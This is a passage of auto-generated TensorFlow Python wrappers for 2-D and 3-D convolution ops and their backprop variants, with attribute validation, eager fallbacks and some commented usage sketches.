"'conv2d_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if use_cudnn_on_gpu is None:
use_cudnn_on_gpu = True
use_cudnn_on_gpu = _execute.make_bool(use_cudnn_on_gpu, "use_cudnn_on_gpu")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'conv2d_backprop_filter' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv2d_backprop_filter' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv2DBackpropFilter", input=input, filter_sizes=filter_sizes,
out_backprop=out_backprop, strides=strides,
padding=padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
explicit_paddings=explicit_paddings,
data_format=data_format, dilations=dilations,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "use_cudnn_on_gpu",
_op._get_attr_bool("use_cudnn_on_gpu"), "padding",
_op.get_attr("padding"), "explicit_paddings",
_op.get_attr("explicit_paddings"), "data_format",
_op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv2DBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv2DBackpropFilter = tf_export("raw_ops.Conv2DBackpropFilter")(_ops.to_raw_op(conv2d_backprop_filter))
def conv2d_backprop_filter_eager_fallback(input, filter_sizes, out_backprop, strides, padding, use_cudnn_on_gpu, explicit_paddings, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv2d_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if use_cudnn_on_gpu is None:
use_cudnn_on_gpu = True
use_cudnn_on_gpu = _execute.make_bool(use_cudnn_on_gpu, "use_cudnn_on_gpu")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'conv2d_backprop_filter' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv2d_backprop_filter' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, out_backprop], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(input, out_backprop) = _inputs_T
filter_sizes = _ops.convert_to_tensor(filter_sizes, _dtypes.int32)
_inputs_flat = [input, filter_sizes, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "use_cudnn_on_gpu",
use_cudnn_on_gpu, "padding", padding, "explicit_paddings",
explicit_paddings, "data_format", data_format, "dilations", dilations)
_result = _execute.execute(b"Conv2DBackpropFilter", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv2DBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
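# --- Illustrative usage (editor's addition, not part of the generated file) ---
# A hedged sketch of the filter-gradient op: given the forward input, the
# filter shape, and the gradient w.r.t. the convolution output, it returns
# the gradient w.r.t. the filter. Shapes are assumptions for illustration:
#
#   import tensorflow as tf
#   x = tf.random.normal([1, 5, 5, 3])
#   dy = tf.random.normal([1, 5, 5, 8])  # matches Conv2D(..., padding="SAME") output
#   dw = tf.raw_ops.Conv2DBackpropFilter(input=x, filter_sizes=[3, 3, 3, 8],
#                                        out_backprop=dy, strides=[1, 1, 1, 1],
#                                        padding="SAME")
#   # dw has shape (3, 3, 3, 8).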
def conv2d_backprop_input(input_sizes, filter, out_backprop, strides, padding, use_cudnn_on_gpu=True, explicit_paddings=[], data_format="NHWC", dilations=[1, 1, 1, 1], name=None):
r"""Computes the gradients of convolution with respect to the input.
Args:
input_sizes: A `Tensor` of type `int32`.
An integer vector representing the shape of `input`,
where `input` is a 4-D `[batch, height, width, channels]` tensor.
filter: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`, `int32`.
4-D with shape
`[filter_height, filter_width, in_channels, out_channels]`.
out_backprop: A `Tensor`. Must have the same type as `filter`.
4-D with shape `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
      of the convolution. Must be in the same order as the dimensions
      specified with `data_format`.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
If `padding` is `"EXPLICIT"`, the list of explicit padding amounts. For the ith
dimension, the amount of padding inserted before and after the dimension is
`explicit_paddings[2 * i]` and `explicit_paddings[2 * i + 1]`, respectively. If
`padding` is not `"EXPLICIT"`, `explicit_paddings` must be empty.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each filter
element on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `filter`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv2DBackpropInput", name, input_sizes, filter, out_backprop,
"strides", strides, "use_cudnn_on_gpu", use_cudnn_on_gpu, "padding",
padding, "explicit_paddings", explicit_paddings, "data_format",
data_format, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv2d_backprop_input_eager_fallback(
input_sizes, filter, out_backprop, strides=strides,
use_cudnn_on_gpu=use_cudnn_on_gpu, padding=padding,
explicit_paddings=explicit_paddings, data_format=data_format,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
      pass
  # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv2d_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if use_cudnn_on_gpu is None:
use_cudnn_on_gpu = True
use_cudnn_on_gpu = _execute.make_bool(use_cudnn_on_gpu, "use_cudnn_on_gpu")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'conv2d_backprop_input' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv2d_backprop_input' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv2DBackpropInput", input_sizes=input_sizes, filter=filter,
out_backprop=out_backprop, strides=strides,
padding=padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
explicit_paddings=explicit_paddings,
data_format=data_format, dilations=dilations,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "use_cudnn_on_gpu",
_op._get_attr_bool("use_cudnn_on_gpu"), "padding",
_op.get_attr("padding"), "explicit_paddings",
_op.get_attr("explicit_paddings"), "data_format",
_op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv2DBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv2DBackpropInput = tf_export("raw_ops.Conv2DBackpropInput")(_ops.to_raw_op(conv2d_backprop_input))
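# Editorial usage sketch: recovering the input gradient of the same assumed
# convolution; `input_sizes` is the static shape of the original input. All
# concrete shapes are illustrative assumptions.
#
#   filt = tf.random.normal([3, 3, 2, 4])     # [fh, fw, in_c, out_c]
#   grad_y = tf.random.normal([1, 8, 8, 4])
#   grad_x = tf.raw_ops.Conv2DBackpropInput(
#       input_sizes=[1, 8, 8, 2], filter=filt, out_backprop=grad_y,
#       strides=[1, 1, 1, 1], padding="SAME")
#   assert grad_x.shape == (1, 8, 8, 2)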
def conv2d_backprop_input_eager_fallback(input_sizes, filter, out_backprop, strides, padding, use_cudnn_on_gpu, explicit_paddings, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv2d_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if use_cudnn_on_gpu is None:
use_cudnn_on_gpu = True
use_cudnn_on_gpu = _execute.make_bool(use_cudnn_on_gpu, "use_cudnn_on_gpu")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'conv2d_backprop_input' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv2d_backprop_input' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([filter, out_backprop], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, _dtypes.int32, ])
(filter, out_backprop) = _inputs_T
input_sizes = _ops.convert_to_tensor(input_sizes, _dtypes.int32)
_inputs_flat = [input_sizes, filter, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "use_cudnn_on_gpu",
use_cudnn_on_gpu, "padding", padding, "explicit_paddings",
explicit_paddings, "data_format", data_format, "dilations", dilations)
_result = _execute.execute(b"Conv2DBackpropInput", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv2DBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def conv3d(input, filter, strides, padding, data_format="NDHWC", dilations=[1, 1, 1, 1, 1], name=None):
r"""Computes a 3-D convolution given 5-D `input` and `filter` tensors.
In signal processing, cross-correlation is a measure of similarity of
two waveforms as a function of a time-lag applied to one of them. This
is also known as a sliding dot product or sliding inner-product.
Our Conv3D implements a form of cross-correlation.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
Shape `[batch, in_depth, in_height, in_width, in_channels]`.
filter: A `Tensor`. Must have the same type as `input`.
Shape `[filter_depth, filter_height, filter_width, in_channels,
out_channels]`. `in_channels` must match between `input` and `filter`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1, 1]`.
1-D tensor of length 5. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by the
value of `data_format`, see above for details. Dilations in the batch and
depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv3D", name, input, filter, "strides", strides, "padding",
padding, "data_format", data_format, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv3d_eager_fallback(
input, filter, strides=strides, padding=padding,
data_format=data_format, dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
      pass
  # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv3D", input=input, filter=filter, strides=strides,
padding=padding, data_format=data_format,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv3D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv3D = tf_export("raw_ops.Conv3D")(_ops.to_raw_op(conv3d))
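# Editorial usage sketch: a 3-D convolution over an NDHWC volume. Note that
# `strides` (and `dilations`) are length 5, with the batch and channel entries
# fixed at 1. Shapes are assumptions.
#
#   vol = tf.random.normal([1, 8, 8, 8, 2])   # [batch, d, h, w, in_c]
#   filt = tf.random.normal([3, 3, 3, 2, 4])  # [fd, fh, fw, in_c, out_c]
#   out = tf.raw_ops.Conv3D(input=vol, filter=filt,
#                           strides=[1, 1, 1, 1, 1], padding="SAME")
#   assert out.shape == (1, 8, 8, 8, 4)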
def conv3d_eager_fallback(input, filter, strides, padding, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(input, filter) = _inputs_T
_inputs_flat = [input, filter]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding,
"data_format", data_format, "dilations", dilations)
_result = _execute.execute(b"Conv3D", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv3D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def conv3d_backprop_filter(input, filter, out_backprop, strides, padding, dilations=[1, 1, 1, 1, 1], name=None):
r"""Computes the gradients of 3-D convolution with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `float32`, `float64`.
Shape `[batch, depth, rows, cols, in_channels]`.
filter: A `Tensor`. Must have the same type as `input`.
Shape `[depth, rows, cols, in_channels, out_channels]`.
`in_channels` must match between `input` and `filter`.
out_backprop: A `Tensor`. Must have the same type as `input`.
Backprop signal of shape `[batch, out_depth, out_rows, out_cols,
out_channels]`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1, 1]`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv3DBackpropFilter", name, input, filter, out_backprop,
"strides", strides, "padding", padding, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv3d_backprop_filter_eager_fallback(
input, filter, out_backprop, strides=strides, padding=padding,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
      pass
  # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_filter' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv3DBackpropFilter", input=input, filter=filter,
out_backprop=out_backprop, strides=strides,
padding=padding, dilations=dilations,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv3DBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv3DBackpropFilter = tf_export("raw_ops.Conv3DBackpropFilter")(_ops.to_raw_op(conv3d_backprop_filter))
def conv3d_backprop_filter_eager_fallback(input, filter, out_backprop, strides, padding, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_filter' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter, out_backprop], ctx, [_dtypes.half, _dtypes.float32, _dtypes.float64, ])
(input, filter, out_backprop) = _inputs_T
_inputs_flat = [input, filter, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding, "dilations",
dilations)
_result = _execute.execute(b"Conv3DBackpropFilter", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv3DBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export(v1=['nn.conv3d_backprop_filter', 'nn.conv3d_backprop_filter_v2'])
@deprecated_endpoints('nn.conv3d_backprop_filter', 'nn.conv3d_backprop_filter_v2')
def conv3d_backprop_filter_v2(input, filter_sizes, out_backprop, strides, padding, data_format="NDHWC", dilations=[1, 1, 1, 1, 1], name=None):
r"""Computes the gradients of 3-D convolution with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
Shape `[batch, depth, rows, cols, in_channels]`.
filter_sizes: A `Tensor` of type `int32`.
An integer vector representing the tensor shape of `filter`,
where `filter` is a 5-D
`[filter_depth, filter_height, filter_width, in_channels, out_channels]`
tensor.
out_backprop: A `Tensor`. Must have the same type as `input`.
Backprop signal of shape `[batch, out_depth, out_rows, out_cols,
out_channels]`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1, 1]`.
1-D tensor of length 5. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by the
value of `data_format`, see above for details. Dilations in the batch and
depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv3DBackpropFilterV2", name, input, filter_sizes,
out_backprop, "strides", strides, "padding", padding, "data_format",
data_format, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv3d_backprop_filter_v2_eager_fallback(
input, filter_sizes, out_backprop, strides=strides, padding=padding,
data_format=data_format, dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
conv3d_backprop_filter_v2, (), dict(input=input,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_filter_v2' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_filter_v2' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv3DBackpropFilterV2", input=input, filter_sizes=filter_sizes,
out_backprop=out_backprop, strides=strides,
padding=padding, data_format=data_format,
dilations=dilations, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
conv3d_backprop_filter_v2, (), dict(input=input,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv3DBackpropFilterV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv3DBackpropFilterV2 = tf_export("raw_ops.Conv3DBackpropFilterV2")(_ops.to_raw_op(conv3d_backprop_filter_v2))
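# Editorial usage sketch: the V2 filter-gradient op takes `filter_sizes`
# instead of the filter tensor itself. Shapes are assumptions matching the
# Conv3D sketch above.
#
#   vol = tf.random.normal([1, 8, 8, 8, 2])
#   grad_y = tf.random.normal([1, 8, 8, 8, 4])
#   grad_w = tf.raw_ops.Conv3DBackpropFilterV2(
#       input=vol, filter_sizes=[3, 3, 3, 2, 4], out_backprop=grad_y,
#       strides=[1, 1, 1, 1, 1], padding="SAME")
#   assert grad_w.shape == (3, 3, 3, 2, 4)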
def conv3d_backprop_filter_v2_eager_fallback(input, filter_sizes, out_backprop, strides, padding, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_filter_v2' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_filter_v2' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, out_backprop], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(input, out_backprop) = _inputs_T
filter_sizes = _ops.convert_to_tensor(filter_sizes, _dtypes.int32)
_inputs_flat = [input, filter_sizes, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding,
"data_format", data_format, "dilations", dilations)
_result = _execute.execute(b"Conv3DBackpropFilterV2", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv3DBackpropFilterV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def conv3d_backprop_input(input, filter, out_backprop, strides, padding, dilations=[1, 1, 1, 1, 1], name=None):
r"""Computes the gradients of 3-D convolution with respect to the input.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `float32`, `float64`.
Shape `[batch, depth, rows, cols, in_channels]`.
filter: A `Tensor`. Must have the same type as `input`.
Shape `[depth, rows, cols, in_channels, out_channels]`.
`in_channels` must match between `input` and `filter`.
out_backprop: A `Tensor`. Must have the same type as `input`.
Backprop signal of shape `[batch, out_depth, out_rows, out_cols,
out_channels]`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1, 1]`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv3DBackpropInput", name, input, filter, out_backprop,
"strides", strides, "padding", padding, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv3d_backprop_input_eager_fallback(
input, filter, out_backprop, strides=strides, padding=padding,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
      pass
  # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_input' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv3DBackpropInput", input=input, filter=filter,
out_backprop=out_backprop, strides=strides,
padding=padding, dilations=dilations,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv3DBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv3DBackpropInput = tf_export("raw_ops.Conv3DBackpropInput")(_ops.to_raw_op(conv3d_backprop_input))
def conv3d_backprop_input_eager_fallback(input, filter, out_backprop, strides, padding, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_input' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter, out_backprop], ctx, [_dtypes.half, _dtypes.float32, _dtypes.float64, ])
(input, filter, out_backprop) = _inputs_T
_inputs_flat = [input, filter, out_backprop]
